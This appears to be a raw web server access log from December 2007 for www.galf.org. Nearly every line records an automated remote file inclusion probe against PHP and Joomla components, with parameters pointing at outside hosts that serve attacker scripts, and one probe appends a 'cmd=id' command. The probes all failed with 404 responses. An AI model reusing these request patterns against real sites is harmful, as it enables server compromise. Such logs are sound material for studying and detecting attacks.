64.38.50.26 - - [09/Dec/2007:18:08:39 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:18:08:39 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:08:49 -0800] "GET /logs/access_070723.log/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:08:49 -0800] "GET /middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:18:08:49 -0800] "GET /logs/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:10:41 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:10:44 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:18:10:56 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:18:10:56 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:18:11:06 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.100.220.45 - - [09/Dec/2007:18:12:32 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.100.220.45 - - [09/Dec/2007:18:12:50 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:13:44 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:13:44 -0800] "GET /logs/access_071105.log/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:13:55 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.30.216.8 - - [09/Dec/2007:18:15:34 -0800] "GET /logs/access.log HTTP/1.0" 200 80430 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:18:16:52 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.196.32.131 - - [09/Dec/2007:18:17:09 -0800] "GET //nav.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:17:45 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:17:46 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:17:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:17:46 -0800] "GET /logs/access_070625.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:18:18:39 -0800] "GET /logs/access_070723.log/middle.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:18:39 -0800] "GET /middle.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:18:39 -0800] "GET /logs/middle.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:19:11 -0800] "GET /logs/access_070924.log/middle.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:22:58 -0800] "GET /logs/index.php3?p=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
63.113.69.15 - - [09/Dec/2007:18:22:59 -0800] "GET /logs/index.php3?p=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:23:00 -0800] "GET /index.php3?p=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.113.69.15 - - [09/Dec/2007:18:23:00 -0800] "GET /index.php3?p=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:23:12 -0800] "GET /logs/access_071105.log/middle.php?page=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.106.59.218 - - [09/Dec/2007:18:23:35 -0800] "GET /test.php?page=http://italytracker.helloweb.eu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:27:29 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:27:29 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:27:29 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
210.114.222.188 - - [09/Dec/2007:18:27:41 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.238.162.140 - - [09/Dec/2007:18:27:52 -0800] "GET /logs/access_070917.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.abarcalaw.com/modules/tinycontent/admin/spaw/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:27:52 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.162.140 - - [09/Dec/2007:18:27:52 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.abarcalaw.com/modules/tinycontent/admin/spaw/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.140 - - [09/Dec/2007:18:27:52 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.abarcalaw.com/modules/tinycontent/admin/spaw/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.140 - - [09/Dec/2007:18:28:15 -0800] "GET /logs/access_070618.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.abarcalaw.com/modules/tinycontent/admin/spaw/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [09/Dec/2007:18:28:48 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [09/Dec/2007:18:28:48 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.140 - - [09/Dec/2007:18:28:49 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.abarcalaw.com/modules/tinycontent/admin/spaw/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.140 - - [09/Dec/2007:18:28:49 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.abarcalaw.com/modules/tinycontent/admin/spaw/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:28:59 -0800] "GET /logs/access.log/index?pag=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.232.66.107 - - [09/Dec/2007:18:28:59 -0800] "GET /index?pag=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:29:00 -0800] "GET /logs/index?pag=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.21.78.60 - - [09/Dec/2007:18:29:08 -0800] "GET /logs/access_070917.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [09/Dec/2007:18:29:09 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [09/Dec/2007:18:29:09 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:29:18 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:29:18 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:29:18 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:18:29:36 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.78.60 - - [09/Dec/2007:18:29:45 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.66.107 - - [09/Dec/2007:18:30:06 -0800] "GET /logs/scripts.log/index?pag=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
204.11.233.206 - - [09/Dec/2007:18:31:36 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:31:37 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:31:37 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:31:41 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:31:41 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:31:41 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.101.244.6 - - [09/Dec/2007:18:31:55 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.101.244.6 - - [09/Dec/2007:18:31:55 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:18:31:56 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:31:57 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.119.158.50 - - [09/Dec/2007:18:32:13 -0800] "GET /logs/access_070827.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
85.119.158.50 - - [09/Dec/2007:18:32:13 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:18:32:13 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:32:21 -0800] "GET /logs/access_070917.log/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:32:21 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:32:21 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:33:15 -0800] "GET /logs/access_070827.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:33:16 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:33:16 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [09/Dec/2007:18:33:20 -0800] "GET /logs/access_070625.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:18:34:28 -0800] "GET /logs/access.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:14 -0800] "GET /logs/access_070917.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:14 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:15 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:29 -0800] "GET /logs/access_070625.log/rss.php?phpraid_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:30 -0800] "GET /rss.php?phpraid_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:30 -0800] "GET /logs/rss.php?phpraid_dir=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.202.3.192 - - [09/Dec/2007:18:35:36 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.25.102 - - [09/Dec/2007:18:35:45 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.108.67.103 - - [09/Dec/2007:18:35:53 -0800] "GET /logs/access_071014.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://army5.com.br/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.19.25.98 - - [09/Dec/2007:18:36:11 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:18:36:12 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.22.37.200 - - [09/Dec/2007:18:36:12 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
74.6.24.15 - - [09/Dec/2007:18:37:14 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
59.106.59.218 - - [09/Dec/2007:18:37:56 -0800] "GET /logs/access_071014.log/test.php?page=http://italytracker.helloweb.eu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
59.106.59.218 - - [09/Dec/2007:18:37:59 -0800] "GET /logs/test.php?page=http://italytracker.helloweb.eu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.210.38.8 - - [09/Dec/2007:18:38:05 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:38:27 -0800] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:38:27 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:38:27 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.233.206 - - [09/Dec/2007:18:38:28 -0800] "GET /logs/access_070917.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.geocities.com/nanda_jaya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.210.38.8 - - [09/Dec/2007:18:38:54 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
59.106.59.218 - - [09/Dec/2007:18:40:57 -0800] "GET /logs/access_070917.log/test.php?page=http://italytracker.helloweb.eu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
